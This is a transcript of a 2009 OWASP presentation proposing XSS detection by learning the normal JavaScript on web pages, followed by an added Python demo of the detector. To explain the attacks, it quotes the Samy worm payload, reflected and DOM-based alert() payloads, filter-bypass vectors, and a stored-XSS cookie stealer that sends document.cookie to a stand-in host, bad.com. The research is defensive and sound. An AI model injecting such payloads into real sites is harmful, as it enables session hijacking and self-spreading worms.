OWASP Plan - Strawman

Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation, OWASP, http://www.owasp.org

A new approach to XSS Detection using JavaScript Modeling
Ofer Rotberg [email protected]
David Movshovitz [email protected]
IDC, September 2009

Transcript of OWASP Plan - Strawman

Page 1: OWASP Plan - Strawman


Page 2: OWASP Plan - Strawman

OWASP 2

Agenda

Background and Motivation

Current Solutions…and drawbacks

Our Approach

Evaluation and Results

Conclusion & Further Work

Page 3: OWASP Plan - Strawman

Web Application Vulnerabilities

Source: IBM Internet Security Systems X-Force® 2008 Trend & Risk Report

Page 4: OWASP Plan - Strawman


Closer Look

Source: “WhiteHat Website Security Statistic Reports”, Dec 2008

Page 5: OWASP Plan - Strawman

Attackers Prefer the Application Layer

The application layer is the weakest link – no generic defense mechanism.

The application layer leads the attacker directly to the data.

A plethora of freely available web applications.

Very simple to perform. Every input has the potential to be an attack vector.

In order to (really) fix, one must change code (on average, 60 days to repair an XSS vulnerability).

Page 6: OWASP Plan - Strawman

MySpace.com virus (a.k.a. Samy worm)

Date: October 5, 2005. Target: force users to become my friends. Samy inserted raw HTML into his profile:

<div id="mycode" expr="alert('hah!')" style="background:url('java script:eval(document.all.mycode.expr)')">

The payload adds Samy to the visitor's friends and copies itself to the visitor's profile.

MySpace was forced to shut down its website, fix the vulnerability, and perform clean-up.

Source: "XSS Worms and Viruses: The Impending Threat and the Best Defense", April 2006, Jeremiah Grossman.

Page 7: OWASP Plan - Strawman

XSS in Detail

Three known types: Reflected (Non-Persistent), Stored (Persistent), DOM Based (Local).

The target is to run hostile JavaScript on the victim's browser.

JavaScript malware can: steal cookies, map internal networks, spread like a worm, …

Page 8: OWASP Plan - Strawman

Reflected XSS

Request: http://www.website.com/index.php?name=Jim

Response:
<html>
<body>Hello, Jim...

Request: http://www.website.com/index.php?name=Jim<script>alert("XSS")</script>

Response:
<html>
<body>Hello, Jim<script>alert("XSS")</script>...

Browser – assumes the server doesn't send malicious content:
Parse HTML – build DOM.
Fetch resources and execute them.

Page 9: OWASP Plan - Strawman


Stored XSS

Page 10: OWASP Plan - Strawman

Stored XSS

Trudy posts the following text on a message board:

Great message! <script>
var img = new Image();
img.src = "http://www.bad.com/CookieStealer/Form1.aspx?s=" + document.cookie;
</script>

When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy.

Page 11: OWASP Plan - Strawman

DOM-Based XSS

First published by Amit Klein (http://www.webappsec.org/projects/articles/071105.shtml)

Benign URL: http://victim/promo?product_id=100&title=Last+Chance
Attack URL: http://victim/promo?product_id=100&title=Foo#<SCRIPT>alert('XSS')</SCRIPT>

<script>
var url = window.location.href;
var pos = url.indexOf("title=") + 6;
var len = url.length;
var title_string = url.substring(pos, len);
document.write(title_string);
</script>

(pos and len mark the start and end of the title value within the URL; the benign URL renders "Last Chance", the attack URL pops the XSS alert.)

Page 12: OWASP Plan - Strawman

Current Solutions

XSS is a sub-problem of Insufficient Input Validation.

Server-Side Application: Static/Dynamic code analysis (white box); Web application scanners (black box).

Server-Side Proxy: Input validation; Escaping / Output encoding ('<' → &lt;); HTTP-request anomaly detection.

Client-Side: Disable JS; Noxes – a web proxy that fetches HTTP requests and can either block or allow based on the current security policy.

Page 13: OWASP Plan - Strawman

Problems with current solutions

Escaping – good practice! But many web applications permit and return HTML tags (<b>, <ul>, …). What about URI schemes like javascript:?

Blacklisting (negative logic) is difficult:
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
…and 100+ more attack vectors in RSnake's XSS Cheatsheet.

An effective filter must also ensure that it does not introduce new scripts:
Before: <img src=". . . " target="onload="malicious script">
After: <img src=". . . " onload="malicious script">

Page 14: OWASP Plan - Strawman

Problems with current solutions (cont.)

Focusing only on the HTTP request is problematic:
Even if an attack was detected, it doesn't mean it will actually occur (false positive).
What about Stored XSS attacks?

Client-side solutions: deployment requires browser modifications/integration.

Page 15: OWASP Plan - Strawman

Problems with current solutions (cont.)

GET http://bank.com/main.php?uName=Jack

Main()
• echo ("<SCRIPT>")
• echo ("document.write("Hello" + "$uName");")
• echo ("</SCRIPT>")

Response (Hello Jack):
<script>
document.write("Hello" + "Jack");
</script>

Page 16: OWASP Plan - Strawman

Problems with current solutions (cont.)

GET http://bank.com/main.php?uName=Jack");alert('xss!')

Main()
• echo ("<SCRIPT>")
• echo ("document.write("Hello" + "$uName");")
• echo ("</SCRIPT>")

Response (Hello Jack):
<script>
document.write("Hello" + "Jack");
alert('xss!');
</script>

The browser pops up: xss!

Page 17: OWASP Plan - Strawman

Our Approach

Positive security logic: anything is illegal unless known to be legal.

Focus on the HTTP response. Model: code-script elements in HTML web pages.

Assumption: the set of all instances of code-script elements is bounded and can be learned in a relatively short period.

1st try – JavaScript code is static.
2nd try – JavaScript code is static under some transformation.

Page 18: OWASP Plan - Strawman


Detector Architecture

Page 19: OWASP Plan - Strawman

XSS Attack Detection

Learning mode: for each extracted JS:
Learn regular form.
Learn canonicalized form.

Three concerns: Coverage; Updating; the learning data-set should contain no malicious JS.
– Deploy detector in testing environment.
– Perform deeper inspection.

Detection mode: for each unknown JS do:
Further inspection.
Strip out.
Inform web-admin.
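The learning and detection modes above, together with the "static under some transformation" idea from the Our Approach slide, as an added example that is not part of the original deck: a small Python detector run over the slides' bank.com main.php pages. The sample responses, the literal-placeholder canonicalization and all function names are assumptions constructed for this demo, not the authors' implementation.

```python
import re

# Constructed sample HTTP responses for the slides' bank.com main.php example
# (hypothetical pages built for this demo; not captured from a real site).
BENIGN_PAGES = [
    '<html><body>Hello Jack<script>\ndocument.write("Hello" + "Jack");\n</script></body></html>',
    '<html><body>Hello Jane<script>\ndocument.write("Hello" + "Jane");\n</script></body></html>',
]
# uName=Jack");alert('xss!') as rendered on the slide: a second statement is injected.
ATTACK_PAGE = ('<html><body>Hello Jack<script>\ndocument.write("Hello" + "Jack");'
               "alert('xss!');\n</script></body></html>")

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
STRING_RE = re.compile(r'"(?:[^"\\]|\\.)*"' + r"|'(?:[^'\\]|\\.)*'")
NUMBER_RE = re.compile(r"\b\d+(?:\.\d+)?\b")

def extract_scripts(html):
    """Return the body of every inline <script> element (the code-script nodes)."""
    return SCRIPT_RE.findall(html)

def regular_form(js):
    """1st try: the script text itself, with whitespace normalised."""
    return " ".join(js.split())

def canonical_form(js):
    """2nd try: string and numeric literals become placeholders, so data the app
    embeds in a script keeps the same node, while an injected statement does not."""
    return " ".join(NUMBER_RE.sub("$NUM", STRING_RE.sub("$STR", js)).split())

def learn(pages, form):
    """Learning mode: the set of known code-script nodes under a given form."""
    return {form(js) for html in pages for js in extract_scripts(html)}

def detect(html, known, form):
    """Detection mode: the script nodes of a page that are unknown (alarm)."""
    return [js for js in extract_scripts(html) if form(js) not in known]

def demo():
    """A new legitimate user (Joe) alarms under the regular form (false positive)
    but not under the canonical form; the injection alarms under both."""
    known_reg = learn(BENIGN_PAGES, regular_form)
    known_can = learn(BENIGN_PAGES, canonical_form)
    new_user = BENIGN_PAGES[0].replace("Jack", "Joe")
    return {
        "regular_fp": len(detect(new_user, known_reg, regular_form)),
        "regular_attack": len(detect(ATTACK_PAGE, known_reg, regular_form)),
        "canonical_fp": len(detect(new_user, known_can, canonical_form)),
        "canonical_attack": len(detect(ATTACK_PAGE, known_can, canonical_form)),
    }
```

Because a legitimate value only changes a literal, canonicalization keeps the node count bounded, which is what lets the learning phase converge on real sites.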

Page 20: OWASP Plan - Strawman

Deployment options

Web proxy: protect a single web application.

Integration with the browser: JS extraction is done by the browser; defends against DOM-based XSS; improved performance.

(Diagram: Web Application – Web Proxy – Client)

Page 21: OWASP Plan - Strawman

Evaluation Methodology

FP: Choose the top-ranked 40 web applications. Crawl each web application. Learn each web page & build a code-elements DB. Perform 2 tests:
Convergence test: #pages needed to learn all JS.
FP test: FP = (#pages causing alarm) / (#pages).

FN: Test the detector against RSnake's cheat-sheet. Choose vulnerable applications from xssed.com. Generate benign input and attack input. Learn with benign. Detect with attack. Each result was also checked manually.

Page 22: OWASP Plan - Strawman

Results

Zero FP.

FN – all attacks were detected.

Convergence Test (plot: CDF, y-axis 0–1, versus number of pages to learn till convergence, x-axis 0–45).

Page 23: OWASP Plan - Strawman

Conclusion

Zero FP under canonicalization.

Generic – targets all types of XSS. Even DOM-based could be mitigated if the web proxy is deployed on the client side.

Fast convergence – short learning period: the number of canonicalized JS nodes is bounded, and most JS nodes appear in every page ("building blocks").

Page 24: OWASP Plan - Strawman

Thanx!

Ofer Rotberg [email protected]

September 2009